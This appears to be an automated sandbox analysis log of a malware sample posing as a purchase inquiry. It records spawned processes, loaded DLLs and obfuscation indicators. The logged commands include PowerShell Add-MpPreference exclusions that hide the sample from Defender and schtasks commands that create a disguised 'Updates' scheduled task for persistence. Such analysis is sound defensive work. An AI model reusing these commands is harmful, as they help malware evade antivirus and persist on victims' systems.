            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Inquiry_002.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp3EA3.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Process created: C:\Users\user\Desktop\Purchase Inquiry_002.exe "C:\Users\user\Desktop\Purchase Inquiry_002.exe"
            Source: unknown | Process created: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp4FBA.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Process created: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe "C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe"
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Inquiry_002.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp3EA3.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: dwrite.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: textshaping.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: windowscodecs.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: edputil.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: appresolver.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: bcp47langs.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: slc.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: sppc.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Section loaded: winnsi.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: mscoree.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: wldp.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: profapi.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: dwrite.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: textshaping.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: amsi.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: userenv.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: windowscodecs.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: propsys.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: edputil.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: netutils.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: appresolver.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: bcp47langs.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: slc.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: sppc.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: winmm.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: wininet.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: netutils.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: Purchase Inquiry_002.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Purchase Inquiry_002.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Purchase Inquiry_002.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: zJGj.pdb source: Purchase Inquiry_002.exe, xASiLfzXONGIW.exe.0.dr
            Source: Binary string: zJGj.pdbSHA2567 source: Purchase Inquiry_002.exe, xASiLfzXONGIW.exe.0.dr

            Data Obfuscation

            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, oAHMyelsBlebo17c9D.cs | .Net Code: WPcMBjNRrc System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, oAHMyelsBlebo17c9D.cs | .Net Code: WPcMBjNRrc System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,14_2_0041A8DA
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Code function: 9_2_0314F448 push ebp; retf 9_2_0314F44A
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_004000D8 push es; iretd 14_2_004000D9
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_0040008C push es; iretd 14_2_0040008D
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_004542E6 push ecx; ret 14_2_004542F9
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_0045B4FD push esi; ret 14_2_0045B506
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_00432BD6 push ecx; ret 14_2_00432BE9
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_00454C08 push eax; ret 14_2_00454C26
            Source: Purchase Inquiry_002.exe | Static PE information: section name: .text entropy: 7.966548982352114
            Source: xASiLfzXONGIW.exe.0.dr | Static PE information: section name: .text entropy: 7.966548982352114
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, KrxB0FGnmZKpkyNbXX.cs | High entropy of concatenated method names: 'vsPBtrBGW', 'xJtEdwoJR', 'yQdgnS2yA', 'ocp8OY3DT', 'rW1sYqSkA', 'PaM3cQKJf', 'Opme0mhLgXvl11dZ7F', 'MwMQuhZrXX7jyjJlPl', 'vARVc4f2M', 'Gw2Xv2ygC'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, D7aMauhAVxQYrmcyD0.cs | High entropy of concatenated method names: 's69fwNT3AD', 'bSXfW9UBry', 'pIWf0ijh5e', 'j4nfebD7F0', 'StuflnRFxY', 'mt60RljglO', 'D1g0ZNwMer', 'x3O0octTUv', 'xwv0mrWREF', 'OAL0Fqyxtl'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, q06fRr1ZQvBKjZ65oK.cs | High entropy of concatenated method names: 'J4sKQOIl62', 'aIeKIaKQOL', 'uc7K15vjlK', 'xUMKyqj2kD', 'O05KxJb5dy', 'uc1K6lWY3W', 'QW4KcGboxg', 'eYYK5ThnUg', 'OOjK9USPsd', 'STOKNx9OyD'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, T4r8SDCIv33WlslpT4.cs | High entropy of concatenated method names: 'ocVW1dFaPc', 'higWytRZIi', 'TQrWnSbhIC', 'KAaWpn9ZLG', 'LZLWRwRLhO', 'ly1WZoLlW6', 'm2iWoEmdPg', 'FmfWmF5a3k', 'bWTWFgfjtl', 'zEJWrgWUTp'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, voy5oLt5lQB891TIpt.cs | High entropy of concatenated method names: 'IkoYChHilV', 'B1TYsyrRk8', 'cSSYhQMx3d', 'kFPYxWGWFR', 'XrNYc8ROXt', 'ooVY51ADgL', 'uctYNYeS1Y', 'ss3YuBSGW1', 'E3aYQHDcL4', 'Of8YDvaFYv'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, cLlsgYs5GgOZjJJuSB.cs | High entropy of concatenated method names: 'SEcHEprBIm', 'vFuHgg3ZFW', 'AQUHCCOb7N', 'rvmHsSBsbE', 'xJIHKRmRUQ', 'STqHiaY15y', 'WvTHqQQZH3', 'WKaHVgiVI5', 'N9fH2WfIOd', 'lgiHXj4EgS'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, sq4j7xSMZiKRMXLZIsG.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OiMv29tXaO', 'P7WvXH6ruU', 'ydUvAfKjOa', 'KJsvvyx2gl', 'SNbvaSSmCM', 'CV9vkOfGbW', 'z8EvOwJ96J'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, geC6IOzmlqxGb0bPnU.cs | High entropy of concatenated method names: 'joFXgtVM1f', 'YgsXCCup30', 'xkaXskxKOK', 'frAXhKG9vx', 'h0vXxMOg0Z', 'vy1XcdSIeE', 'm6xX5pgE9X', 'xfmXOHHfUv', 'uvrX7V0cHE', 'ts5Xd6QyZ5'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, maZXEQ3nDp1ljW9RCv.cs | High entropy of concatenated method names: 'WZ904CbVya', 'zx508hIuOS', 'y91H66xFOJ', 'tZYHcW6TEy', 'WiwH5ueiVQ', 'jhWH9TY2TZ', 'pXdHN4Hplk', 'YM9HueLwsO', 'bIDHL46n8u', 'wIsHQ2lVh0'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, JWCbu2STQmAFYrqZv8L.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Sv5XD5E603', 'gY0XIB7kQ7', 'A0wXt0vc4s', 'M7lX1DcW04', 'xUFXyo1PxI', 'UHaXnS9iE2', 'GCeXp7M7Wg'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, QYTZ0oovg5cvcw2BTs.cs | High entropy of concatenated method names: 'UXs2KM2jco', 'EVL2q4o6Xq', 'Fmf22FGS89', 'k4f2ADpjHr', 'lIq2aoAJIx', 'unY2OtWk80', 'Dispose', 'Ur5VjauifP', 'Ae4VWBla1T', 'li3VHmFfck'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, hQHmh5SGuePN8j0Gbyu.cs | High entropy of concatenated method names: 'ToString', 'dqmACmHWL1', 'prsAsS4YGI', 'f8oA3bQ3ZA', 'T52AhW6PjM', 'E39Ax2qPDY', 'xClA64cxKb', 'ag0AcTfi5B', 'WQmwu7WfS8tc51jNQEo', 'aGivGAWO8QlJWtVySWZ'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, mRNTsXSSyB5C1XtedV6.cs | High entropy of concatenated method names: 'enFXrmbGgD', 'Ny9XzvgyX1', 'WhUATuBBSu', 'k8RASglAh7', 'UJtAG5soYc', 'grLAbAWoMg', 'J4rAMDXoOm', 'fFYAwHlsH0', 'MoCAjuB0SC', 'dTYAWGtM3u'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, rmh2ZarBytsKoPdbuC.cs | High entropy of concatenated method names: 'H4AXH8g7yW', 'q3BX06cgV5', 'qytXfo7ZQB', 'sC2Xerb7Da', 'VboX2Da0on', 'KZnXlBDAtv', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, EvUA2UpoCgZNBBO9DW.cs | High entropy of concatenated method names: 'IVOqJ6Q61y', 'B7DqPmqbbs', 'ToString', 'wqnqjnY9Y9', 'orUqWXk7tC', 'EmlqH1WaAC', 'hBAq0XVXJa', 'Osfqfmb9sD', 'FcAqeKLg3E', 'qeoqlI5lsr'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, Dp9d0sMygJjXH0e0n6.cs | High entropy of concatenated method names: 'hDpSe4r8SD', 'Pv3Sl3Wlsl', 'o5GSJgOZjJ', 'muSSPBJaZX', 'f9RSKCvC7a', 'eauSiAVxQY', 'jTjQo4khR4aPaqNxXF', 'SEUZZlLZ9C9jUkAfmZ', 'uJOSSbksl8', 'rEaSbn3PIn'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, LmWRlEFadn72bQ25uI.cs | High entropy of concatenated method names: 'Tdb2hPs62w', 'swZ2xMwDbm', 'k1d26eqDgf', 'uFB2cb9w8C', 'CF6253dokS', 'zjN29i6ANb', 'CKV2NNJDym', 'xQW2uT0RWL', 'wX92Lw09t6', 'JaB2QvOvNn'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, MxJBTdnmkSbNwtYdT9.cs | High entropy of concatenated method names: 'ToString', 'R8YiD9L5L1', 'vJKixlI7iH', 'a4ni6JGgPG', 'WUDick8F3Y', 'SMRi5xM1N9', 'ELQi90a2j8', 'BXiiNuqFrB', 'LP2iu7y4vQ', 'mXCiLLGB78'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, oAHMyelsBlebo17c9D.cs | High entropy of concatenated method names: 'lG7bwMD3C1', 'CBjbjCENcR', 'OgBbWWLvRc', 'JMhbHn7Q6D', 'Cibb0ddesT', 'XObbfxrFSN', 'aibbenTsjF', 'pGgbljXhUJ', 'UVnbUhQ7rh', 'BZ4bJsjh1V'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, XVx5eEZqSV66eFTjYZ.cs | High entropy of concatenated method names: 'dhfqmjHUXb', 'UNgqrGWUkb', 'dfOVTWFHZI', 'BxlVSIuUPi', 'm8hqDkdfD2', 'W6mqIJTbJR', 'QxJqtGHmoA', 'P1Mq1OEmyJ', 'hEjqyGRcQE', 'rdEqnx644D'
